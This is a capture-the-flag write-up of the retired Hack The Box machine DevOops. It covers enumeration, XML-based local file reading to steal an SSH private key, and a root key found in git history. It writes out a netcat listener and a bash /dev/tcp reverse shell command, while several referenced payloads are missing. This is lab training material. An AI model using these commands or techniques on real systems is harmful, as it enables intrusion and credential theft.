Hackthebox – DevOops Writeup

This is a writeup for the DevOops machine on hackthebox.eu which was retired on 10/13/18!

First, enumerate! Let’s try the custom python enumeration script a friend of ours made:

The nmap part of the script indicates that:
ports 22 and 5000 are open
ssh is on 22 and supports publickey and password authentication
Server is Linux CPE OS, x86.

dirb shows:
5000 is serving http for /feed and /upload

ok going to gives us an image with nothing much else.

going to /upload gets us a page that says “send feed with XML” and allows us to upload – ok we will upload stuff 🙂

Googling for xml injection exploits gets us this page:

We get local file inclusion by uploading the following .xml script:

The interesting users found with this are:

Let’s go ahead and get the user flag with this approach, so we upload the following .xml file:

Next, let’s work on getting the root flag:
we found this page about getting SSH credentials via LFI:https://digi.ninja/blog/when_all_you_can_do_is_read.php

Therefore, we use the following code to dump the ssh creds to roosa:

This gets us the RSA key so we save that on our kali machine as id_rsa
we then need to chmod the key:
chmod 600 id_rsa

and then log in with it:
ssh roosa@ -i id_rsa

We do a reverse nc shell because it’s a bit slow on ssh for some reason:
we run the following on kali: nc -lvnp 7734
and this on the victim: /bin/bash -i >& /dev/tcp/ 0>&1

we found a git directory here:

so we run the following command:
git log -p

which shows another SSH key that is different from Roosa’s

we save this one as auth2.key
and we login to root with
ssh root@ -i auth2.key

This gives us the root flag and we are done!

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